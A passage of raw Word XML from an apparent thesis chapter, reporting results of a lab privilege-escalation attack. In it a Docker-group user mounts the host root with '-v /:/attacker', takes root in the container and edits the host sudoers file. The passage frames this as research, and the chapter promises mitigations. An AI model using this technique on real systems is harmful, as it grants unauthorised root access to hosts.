    <w:p w14:paraId="5656E8ED" w14:textId="77777777" w:rsidR="0098184A" w:rsidRPr="0098184A" w:rsidRDefault="0098184A" w:rsidP="0098184A"/>
    <w:p w14:paraId="017F6EBE" w14:textId="77777777" w:rsidR="009E40F6" w:rsidRPr="009E40F6" w:rsidRDefault="009E40F6" w:rsidP="009E40F6"/>
    <w:p w14:paraId="1C9DED46" w14:textId="3560DF0B" w:rsidR="00550694" w:rsidRPr="00550694" w:rsidRDefault="00550694" w:rsidP="00550694"/>
    <w:p w14:paraId="3A945964" w14:textId="77777777" w:rsidR="009C0AC6" w:rsidRPr="009C0AC6" w:rsidRDefault="009C0AC6" w:rsidP="009C0AC6"/>
    <w:p w14:paraId="387320E9" w14:textId="77777777" w:rsidR="00072AF0" w:rsidRPr="00072AF0" w:rsidRDefault="00072AF0" w:rsidP="00072AF0"/>
    <w:p w14:paraId="0ACF50EF" w14:textId="77777777" w:rsidR="00C322CB" w:rsidRPr="00C322CB" w:rsidRDefault="00C322CB" w:rsidP="00C322CB"/>
    <w:p w14:paraId="408744C3" w14:textId="77777777" w:rsidR="00C03AB3" w:rsidRDefault="00C03AB3" w:rsidP="0070485A"/>
    <w:p w14:paraId="33AA183E" w14:textId="0208C6D1" w:rsidR="0070485A" w:rsidRDefault="002114C7" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="201" w:name="_Toc87032941"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="001621DA">
        <w:t>RESULTS</w:t>
      </w:r>
      <w:r w:rsidR="0070485A">
        <w:t xml:space="preserve"> AND </w:t>
      </w:r>
      <w:r w:rsidR="001621DA">
        <w:t>DISCUSSIONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201"/>
    </w:p>
    <w:p w14:paraId="7F85AABC" w14:textId="5D148201" w:rsidR="00C663FF" w:rsidRDefault="0049245D" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="202" w:name="_Toc87032942"/>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202"/>
    </w:p>
    <w:p w14:paraId="76CC3926" w14:textId="414789F2" w:rsidR="006344FA" w:rsidRDefault="00EC6C39" w:rsidP="006344FA">
      <w:r>
        <w:t xml:space="preserve">This chapter will discuss and analyse the results obtained </w:t>
      </w:r>
      <w:r w:rsidR="005F326B">
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidR="00AD7B33">
        <w:t xml:space="preserve"> running</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the experiment</w:t>
      </w:r>
      <w:r w:rsidR="00A23F11">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of each attack.</w:t>
      </w:r>
      <w:r w:rsidR="00531B58">
        <w:t xml:space="preserve"> The author will compare </w:t>
      </w:r>
      <w:r w:rsidR="0044447B">
        <w:t xml:space="preserve">and justify </w:t>
      </w:r>
      <w:r w:rsidR="00531B58">
        <w:t xml:space="preserve">the results </w:t>
      </w:r>
      <w:r w:rsidR="000F41AC">
        <w:t xml:space="preserve">with the </w:t>
      </w:r>
      <w:r w:rsidR="00B2245A">
        <w:t>literature review</w:t>
      </w:r>
      <w:r w:rsidR="00B70029">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F65FE">
        <w:t xml:space="preserve">to decide whether </w:t>
      </w:r>
      <w:r w:rsidR="008E5380">
        <w:t>the attacks were successful or not.</w:t>
      </w:r>
      <w:r w:rsidR="001922FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA7A61">
        <w:t xml:space="preserve">Further, </w:t>
      </w:r>
      <w:r w:rsidR="008B0D77">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="00DA7A61">
        <w:t xml:space="preserve">will provide </w:t>
      </w:r>
      <w:r w:rsidR="008B0D77">
        <w:t>various mitigation methods for each attack. Moreover</w:t>
      </w:r>
      <w:r w:rsidR="001922FA">
        <w:t xml:space="preserve">, this </w:t>
      </w:r>
      <w:r w:rsidR="00CE08EF">
        <w:t xml:space="preserve">chapter will </w:t>
      </w:r>
      <w:r w:rsidR="009F3533">
        <w:t>evaluate the outcome</w:t>
      </w:r>
      <w:r w:rsidR="00805222">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00533CF5">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00570F7D">
        <w:t xml:space="preserve"> determin</w:t>
      </w:r>
      <w:r w:rsidR="00533CF5">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00570F7D">
        <w:t xml:space="preserve"> whether the aims and objectives</w:t>
      </w:r>
      <w:r w:rsidR="009F3533">
        <w:t xml:space="preserve"> of this project </w:t>
      </w:r>
      <w:r w:rsidR="00570F7D">
        <w:t>ha</w:t>
      </w:r>
      <w:r w:rsidR="00CF36C8">
        <w:t>ve been achieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EFBBD8" w14:textId="11297D78" w:rsidR="000562D3" w:rsidRDefault="00D84EA5" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="203" w:name="_Toc87032943"/>
      <w:r>
        <w:t>RESULTS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203"/>
    </w:p>
    <w:p w14:paraId="4C578677" w14:textId="363C95DC" w:rsidR="00961762" w:rsidRDefault="00912D0E" w:rsidP="00961762">
      <w:r>
        <w:t xml:space="preserve">This section </w:t>
      </w:r>
      <w:r w:rsidR="00E12721">
        <w:t xml:space="preserve">presents </w:t>
      </w:r>
      <w:r w:rsidR="0089129F">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00D84EA5">
        <w:t>results</w:t>
      </w:r>
      <w:r w:rsidR="0089129F">
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="00D84EA5">
        <w:t xml:space="preserve">each </w:t>
      </w:r>
      <w:r w:rsidR="0089129F">
        <w:t xml:space="preserve">attack </w:t>
      </w:r>
      <w:r w:rsidR="0092321E">
        <w:t>demonstrated in the previous chapter.</w:t>
      </w:r>
      <w:r w:rsidR="005C23E3">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00D84EA5">
        <w:t>results</w:t>
      </w:r>
      <w:r w:rsidR="005C23E3">
        <w:t xml:space="preserve"> are divided into three </w:t>
      </w:r>
      <w:r w:rsidR="004C7D2C">
        <w:t>sections</w:t>
      </w:r>
      <w:r w:rsidR="005E24D8">
        <w:t xml:space="preserve"> representing each attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097E2951" w14:textId="148D2F16" w:rsidR="003967E1" w:rsidRDefault="003967E1" w:rsidP="00961762">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2A54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Privilege es</w:t>
      </w:r>
      <w:r w:rsidR="001D2EA1" w:rsidRPr="00CA2A54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>calation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07541DB6" w14:textId="255A16BE" w:rsidR="00CA2A54" w:rsidRDefault="00AC3D60" w:rsidP="00961762">
      <w:r>
        <w:t>In this attack</w:t>
      </w:r>
      <w:r w:rsidR="00587E1C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00D819EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A2182">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00FB4227">
        <w:t>standard</w:t>
      </w:r>
      <w:r w:rsidR="009A2182">
        <w:t xml:space="preserve"> user was </w:t>
      </w:r>
      <w:r w:rsidR="00C76C93">
        <w:t>able</w:t>
      </w:r>
      <w:r w:rsidR="000D0921">
        <w:t xml:space="preserve"> to escape</w:t>
      </w:r>
      <w:r w:rsidR="00C76C93">
        <w:t xml:space="preserve"> his/her privilege</w:t>
      </w:r>
      <w:r w:rsidR="000D0921">
        <w:t xml:space="preserve"> to root user</w:t>
      </w:r>
      <w:r w:rsidR="0010596F">
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidR="00F25FCB">
        <w:t>taking advantage of</w:t>
      </w:r>
      <w:r w:rsidR="00BB7FF3">
        <w:t xml:space="preserve"> becoming</w:t>
      </w:r>
      <w:r w:rsidR="00F25FCB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00647AF9">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00F25FCB">
        <w:t>Docker group.</w:t>
      </w:r>
      <w:r w:rsidR="0010596F">
        <w:t xml:space="preserve"> Initially, the user </w:t>
      </w:r>
      <w:r w:rsidR="006D3B16">
        <w:t xml:space="preserve">has no privilege to run root or sudoers command, as shown in figure </w:t>
      </w:r>
      <w:r w:rsidR="004E21A5">
        <w:t>58</w:t>
      </w:r>
      <w:r w:rsidR="009754D6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005F769D">
        <w:t xml:space="preserve"> However, the user was </w:t>
      </w:r>
      <w:r w:rsidR="00293E69">
        <w:t xml:space="preserve">added to the Docker group </w:t>
      </w:r>
      <w:r w:rsidR="00E63A11">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="0068488F">
        <w:t xml:space="preserve"> run any Docker commands on the host. As </w:t>
      </w:r>
      <w:r w:rsidR="000D4D34">
        <w:t xml:space="preserve">a result, the </w:t>
      </w:r>
      <w:r w:rsidR="0075568E">
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="000D4D34">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D82D20">
        <w:t>created a Dockerfile</w:t>
      </w:r>
      <w:r w:rsidR="00F0319D">
        <w:t xml:space="preserve"> script</w:t>
      </w:r>
      <w:r w:rsidR="00D82D20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C14B6">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="001514D9">
        <w:t>allows him</w:t>
      </w:r>
      <w:r w:rsidR="00FA603A">
        <w:t xml:space="preserve"> to mount </w:t>
      </w:r>
      <w:r w:rsidR="00292F8F">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00EF288A">
        <w:t>entire working directory</w:t>
      </w:r>
      <w:r w:rsidR="006A38BB">
        <w:t xml:space="preserve"> of the host</w:t>
      </w:r>
      <w:r w:rsidR="000A3FAB">
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:r w:rsidR="00B1176B">
        <w:t>running instance container</w:t>
      </w:r>
      <w:r w:rsidR="0071180E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE668E7" w14:textId="3C48B180" w:rsidR="009317D1" w:rsidRDefault="009317D1" w:rsidP="004E5A1D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75D309D1" wp14:editId="675B5A89">
            <wp:extent cx="3175000" cy="748030"/>
            <wp:effectExtent l="0" t="0" r="635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175000" cy="748030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE5492D" w14:textId="56CEA5B9" w:rsidR="000C4772" w:rsidRDefault="004F5DD5" w:rsidP="00632BAF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="204" w:name="_Toc86858649"/>
      <w:bookmarkStart w:id="205" w:name="_Toc86867539"/>
      <w:r w:rsidRPr="00721056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00721056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00721056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00721056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>58</w:t>
      </w:r>
      <w:r w:rsidRPr="00721056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C64010">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:Before the attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204"/>
      <w:bookmarkEnd w:id="205"/>
    </w:p>
    <w:p w14:paraId="278ED5C7" w14:textId="56716FD9" w:rsidR="00A634EE" w:rsidRDefault="007C15F3" w:rsidP="00A634EE">
      <w:r>
        <w:t xml:space="preserve">Therefore, the attacker launched a container </w:t>
      </w:r>
      <w:r w:rsidR="00486826">
        <w:t xml:space="preserve">based on the Docker image </w:t>
      </w:r>
      <w:r w:rsidR="0063454E">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="009E0FC3">
        <w:t xml:space="preserve">provides </w:t>
      </w:r>
      <w:r w:rsidR="002A495C">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="009E0FC3">
        <w:t>interactive shell</w:t>
      </w:r>
      <w:r w:rsidR="007F0823">
        <w:t>, as shown in figure 59.</w:t>
      </w:r>
      <w:r w:rsidR="004674C9">
        <w:t xml:space="preserve"> The command </w:t>
      </w:r>
      <w:r w:rsidR="00DB402E">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="004674C9">
        <w:t>-v /</w:t>
      </w:r>
      <w:r w:rsidR="00DB402E">
        <w:t xml:space="preserve">:/attacker” </w:t>
      </w:r>
      <w:r w:rsidR="001B2211">
        <w:t xml:space="preserve">paves </w:t>
      </w:r>
      <w:r w:rsidR="002A495C">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00497234">
        <w:t>way to the attacker as the root directory “/”</w:t>
      </w:r>
      <w:r w:rsidR="006C5491">
        <w:t xml:space="preserve"> on the host</w:t>
      </w:r>
      <w:r w:rsidR="00497234">
        <w:t xml:space="preserve"> is accessible </w:t>
      </w:r>
      <w:r w:rsidR="000A1A59">
        <w:t>in the</w:t>
      </w:r>
      <w:r w:rsidR="00C75C63">
        <w:t xml:space="preserve"> “/attacker” directory</w:t>
      </w:r>
      <w:r w:rsidR="00D62DE6">
        <w:t xml:space="preserve"> of the </w:t>
      </w:r>
      <w:r w:rsidR="0024354F">
        <w:t>container.</w:t>
      </w:r>
      <w:r w:rsidR="00B44D0F">
        <w:t xml:space="preserve"> The container also </w:t>
      </w:r>
      <w:r w:rsidR="003445C3">
        <w:t xml:space="preserve">provides the attacker with shell </w:t>
      </w:r>
      <w:r w:rsidR="002F6572">
        <w:t>access to run bash commands inside the container.</w:t>
      </w:r>
      <w:r w:rsidR="00F54ED3">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00B14A33">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00F54ED3">
        <w:t xml:space="preserve">commands in figure 59 </w:t>
      </w:r>
      <w:r w:rsidR="00414038">
        <w:t>granted</w:t>
      </w:r>
      <w:r w:rsidR="003E23C3">
        <w:t xml:space="preserve"> the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00E6598A">
        <w:t>with root privilege</w:t>
      </w:r>
      <w:r w:rsidR="008732EC">
        <w:t xml:space="preserve"> inside the container </w:t>
      </w:r>
      <w:r w:rsidR="00F12C2D">
        <w:t>but not in the host machine.</w:t>
      </w:r>
      <w:r w:rsidR="007374C2">
        <w:t xml:space="preserve"> However,</w:t>
      </w:r>
      <w:r w:rsidR="008F2ECF">
        <w:t xml:space="preserve"> the attacker has acc</w:t>
      </w:r>
      <w:r w:rsidR="00435819">
        <w:t>ess to</w:t>
      </w:r>
      <w:r w:rsidR="008F2ECF">
        <w:t xml:space="preserve"> the entire host </w:t>
      </w:r>
      <w:r w:rsidR="00A44D3B">
        <w:t>root directory</w:t>
      </w:r>
      <w:r w:rsidR="00435819">
        <w:t xml:space="preserve"> because </w:t>
      </w:r>
      <w:r w:rsidR="00880123">
        <w:t xml:space="preserve">the root </w:t>
      </w:r>
      <w:r w:rsidR="00291110">
        <w:t xml:space="preserve">volume </w:t>
      </w:r>
      <w:r w:rsidR="00435819">
        <w:t xml:space="preserve">“/” </w:t>
      </w:r>
      <w:r w:rsidR="0004566D">
        <w:t>is mounted</w:t>
      </w:r>
      <w:r w:rsidR="005005AE">
        <w:t xml:space="preserve"> to the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00CE7824">
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidR="005005AE">
        <w:t xml:space="preserve"> working directory.</w:t>
      </w:r>
      <w:r w:rsidR="00071730">
        <w:t xml:space="preserve"> Thus, the </w:t>
      </w:r>
      <w:r w:rsidR="00856A8D">
        <w:t xml:space="preserve">attacker </w:t>
      </w:r>
      <w:r w:rsidR="008D7E52">
        <w:t>escaped one level and added himself to the</w:t>
      </w:r>
      <w:r w:rsidR="003D29E6">
        <w:t xml:space="preserve"> sudoers file </w:t>
      </w:r>
      <w:r w:rsidR="00612A98">
        <w:t xml:space="preserve">using the commands </w:t>
      </w:r>
      <w:r w:rsidR="00784E13">
        <w:t>shown</w:t>
      </w:r>
      <w:r w:rsidR="00526596">
        <w:t xml:space="preserve"> in figure 28</w:t>
      </w:r>
      <w:r w:rsidR="00784E13">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF3033">
        <w:t xml:space="preserve">on the </w:t>
      </w:r>
      <w:r w:rsidR="00784E13">
        <w:t>above.</w:t>
      </w:r>
      <w:r w:rsidR="00526596">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F5486">
        <w:t xml:space="preserve">Finally, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00E72B76">
        <w:t xml:space="preserve">was able to run bash commands without </w:t>
      </w:r>
      <w:r w:rsidR="00632BAF">
        <w:t>supplying or knowing</w:t>
      </w:r>
      <w:r w:rsidR="004824B1">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00632BAF">
        <w:t xml:space="preserve"> root password, as shown in figure 60.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B047359" w14:textId="6FD74FA8" w:rsidR="0063454E" w:rsidRDefault="0063454E" w:rsidP="0063454E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="520B10F1" wp14:editId="0D95CED0">
            <wp:extent cx="4544060" cy="859155"/>
            <wp:effectExtent l="0" t="0" r="889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44060" cy="859155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3217C650" w14:textId="4FB66CA5" w:rsidR="00632BAF" w:rsidRPr="008F5F41" w:rsidRDefault="00632BAF" w:rsidP="008F704B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="206" w:name="_Toc86858650"/>
      <w:bookmarkStart w:id="207" w:name="_Toc86867540"/>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>59</w:t>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="005122BB" w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r w:rsidR="00AE1279" w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>container launched based on the base image attacker.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206"/>
      <w:bookmarkEnd w:id="207"/>
    </w:p>
    <w:p w14:paraId="4997697E" w14:textId="4B3FCF6B" w:rsidR="00CB4414" w:rsidRDefault="00CB4414" w:rsidP="004F5DD5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C828936" w14:textId="2F4E0AE1" w:rsidR="00E44678" w:rsidRDefault="00632BAF" w:rsidP="00632BAF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67717A0D" wp14:editId="29F3737E">
            <wp:extent cx="3581337" cy="729615"/>
            <wp:effectExtent l="0" t="0" r="63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625959" cy="738706"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6004208B" w14:textId="285AFE66" w:rsidR="00632BAF" w:rsidRDefault="00632BAF" w:rsidP="008F704B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="208" w:name="_Toc86858651"/>
      <w:bookmarkStart w:id="209" w:name="_Toc86867541"/>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>60</w:t>
      </w:r>
      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
